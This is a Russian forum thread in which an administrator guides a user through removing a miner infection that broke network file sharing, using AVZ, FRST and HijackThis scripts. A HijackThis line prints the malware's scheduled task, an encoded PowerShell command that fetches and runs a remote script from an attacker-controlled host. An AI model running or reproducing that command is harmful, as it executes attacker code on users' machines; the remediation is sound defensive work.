• Внимание. Восстановление баз 1С7, 1C8 и Mssql после атаки шифровальщика, подробности и отзывы читайте в профильной теме.

Закрыто Пропал общий доступ

Статус
В этой теме нельзя размещать новые ответы.

qvaqsha

Новый пользователь
Сообщения
21
Реакции
1
Баллы
3
Доброго времени суток.
Не работает общий доступ к папкам на сервере у половины компов не работает
нашёл майнер, запустил нужные службы но доступ не работает.
Помогите пожалуйста починиться, не хочется ночь в офисе сидеть переустанавливать винды
 

Вложения

akok

Команда форума
Администратор
Сообщения
19,301
Реакции
13,321
Баллы
2,203
запустил нужные службы но доступ не работает.
Сами отключали до этого?

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ из папки Autologger (Файл - Выполнить скрипт):
Код:
  begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 SetServiceStart('SeHaeSees', 4);
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\_ctypes.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\_hashlib.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\_socket.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\_ssl.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_ARC4.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_aes.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_cbc.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_cfb.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_ctr.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_des.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_des3.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_ecb.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_ocb.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_ofb.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_Salsa20.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_BLAKE2s.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_ghash_clmul.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_ghash_portable.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_MD4.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_MD5.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_SHA1.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_SHA256.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Protocol\_scrypt.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Util\_cpuid_c.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Util\_strxor.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\select.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19842\MSVCR90.dll', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19842\python27.dll', '');
 QuarantineFile('C:\Windows\temp\SecurityDig.exe', '');
 QuarantineFile('C:\Windows\Temp\SecurityHaelth.exe', '');
 QuarantineFile('c:\windows\temp\securityhaelthexec.exe', '');
 QuarantineFile('C:\Windows\Temp\SecurityHaelthRun.exe', '');
 QuarantineFile('c:\windows\temp\securityhaelthservice.exe', '');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\_ctypes.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\_hashlib.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\_socket.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\_ssl.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_ARC4.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_aes.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_cbc.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_cfb.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_ctr.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_des.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_des3.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_ecb.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_ocb.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_ofb.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_Salsa20.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_BLAKE2s.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_ghash_clmul.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_ghash_portable.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_MD4.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_MD5.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_SHA1.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_SHA256.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Protocol\_scrypt.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Util\_cpuid_c.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Util\_strxor.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\select.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19842\MSVCR90.dll', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19842\python27.dll', '32');
 DeleteFile('C:\Windows\temp\SecurityDig.exe', '64');
 DeleteFile('C:\Windows\Temp\SecurityHaelth.exe', '64');
 DeleteFile('c:\windows\temp\securityhaelthexec.exe', '32');
 DeleteFile('C:\Windows\Temp\SecurityHaelthRun.exe', '32');
 DeleteFile('c:\windows\temp\securityhaelthservice.exe', '32');
 DeleteService('SeHaeSees');
 DeleteSchedulerTask('AutDnsScan');
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
BC_ImportALL;
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
BC_Activate;
RebootWindows(true);
end.
Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.
Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O22 - Task: AutFree - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYgBpAG4AZwAuAHAAcgBvAHQAbwBwAG8AdwBlAHIALgBpAGMAdQAvAGMAbwBrADkALgBqAHMAJwApAA==
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

qvaqsha

Новый пользователь
Сообщения
21
Реакции
1
Баллы
3
Сами отключали до этого?
нет их похоже вирус вырубал, т.к. я их включал а после перезагрузки они снова отключенные были
 

akok

Команда форума
Администратор
Сообщения
19,301
Реакции
13,321
Баллы
2,203
В логах есть профильный софт который может вызывать такие симптомы.

2 - Task: start egais - C:\run\start_egais.bat - ваше?
 

qvaqsha

Новый пользователь
Сообщения
21
Реакции
1
Баллы
3
В логах есть профильный софт который может вызывать такие симптомы.

2 - Task: start egais - C:\run\start_egais.bat - ваше?
Да это просто запуск служб УТМ ЕГАИС.
Логи прикрепил
 

Вложения

akok

Команда форума
Администратор
Сообщения
19,301
Реакции
13,321
Баллы
2,203
В логах уже чисто. Пробуйте запустить службы и проверять сеть, а так дочистим немного мусора.

Сами добавляли политики?
HKLM Group Policy restriction on software: *cscript* <==== ATTENTION
HKLM Group Policy restriction on software: *wscript* <==== ATTENTION

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
    FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
    FirewallRules: [{3B87E052-106E-4429-BE43-999397795824}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe No File
    FirewallRules: [{D27FBB0D-81AF-4FC9-995F-5E5514A8257F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe No File
    FirewallRules: [TCP Query User{59DC7654-F28B-4078-A8EF-05AD81C29A12}C:\program files (x86)\cl\comp_name.exe] => (Allow) C:\program files (x86)\cl\comp_name.exe No File
    FirewallRules: [UDP Query User{324A0558-98D2-41B4-A146-62BB85F0EAE7}C:\program files (x86)\cl\comp_name.exe] => (Allow) C:\program files (x86)\cl\comp_name.exe No File
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.
 

qvaqsha

Новый пользователь
Сообщения
21
Реакции
1
Баллы
3
Карантин отправил на почту
 

akok

Команда форума
Администратор
Сообщения
19,301
Реакции
13,321
Баллы
2,203
Карантин получил и отправил в обработку.
 

qvaqsha

Новый пользователь
Сообщения
21
Реакции
1
Баллы
3
В логах уже чисто. Пробуйте запустить службы и проверять сеть, а так дочистим немного мусора.

Сами добавляли политики?
HKLM Group Policy restriction on software: *cscript* <==== ATTENTION
HKLM Group Policy restriction on software: *wscript* <==== ATTENTION

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
    FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
    FirewallRules: [{3B87E052-106E-4429-BE43-999397795824}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe No File
    FirewallRules: [{D27FBB0D-81AF-4FC9-995F-5E5514A8257F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe No File
    FirewallRules: [TCP Query User{59DC7654-F28B-4078-A8EF-05AD81C29A12}C:\program files (x86)\cl\comp_name.exe] => (Allow) C:\program files (x86)\cl\comp_name.exe No File
    FirewallRules: [UDP Query User{324A0558-98D2-41B4-A146-62BB85F0EAE7}C:\program files (x86)\cl\comp_name.exe] => (Allow) C:\program files (x86)\cl\comp_name.exe No File
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.
Политики сам добавил. Это запрет на запуск wscript и cscript.
 

Вложения

akok

Команда форума
Администратор
Сообщения
19,301
Реакции
13,321
Баллы
2,203
Что с проблемой?
 

qvaqsha

Новый пользователь
Сообщения
21
Реакции
1
Баллы
3
Что с проблемой?
Всё сделал, общего доступа нет :( откатываюсь на точку восстановления 20.12.19, один комп помогло, после отката всё заработало, накатил сразу заплатки которые вы советовали по "Mysa", может ещё какие заплатки надо накатить?
 

akok

Команда форума
Администратор
Сообщения
19,301
Реакции
13,321
Баллы
2,203
Как альтернатива можно пробовать восстановить

Бекап обязателен, т.к. в некоторых случаях (крайне редких) может положить систему.

По поводу заплаток тут поможет SecurityCheck by glax24, а в случае с серверным ПО, то скрипт AVZ

Выполните скрипт в AVZ при наличии доступа в интернет:

Код:
var
LogPath : string;
ScriptPath : string;

begin
LogPath := GetAVZDirectory + 'log\avz_log.txt';
if FileExists(LogPath) Then DeleteFile(LogPath);
ScriptPath := GetAVZDirectory +'ScanVuln.txt';

  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
       ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
       exit;
      end;
  end;
if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.
После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к Java Runtime Environment, Adobe Reader и Adobe Flash Player, это программы, уязвимостями в которых наиболее часто пользуются для внедрения зловредов в систему.
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху Снизу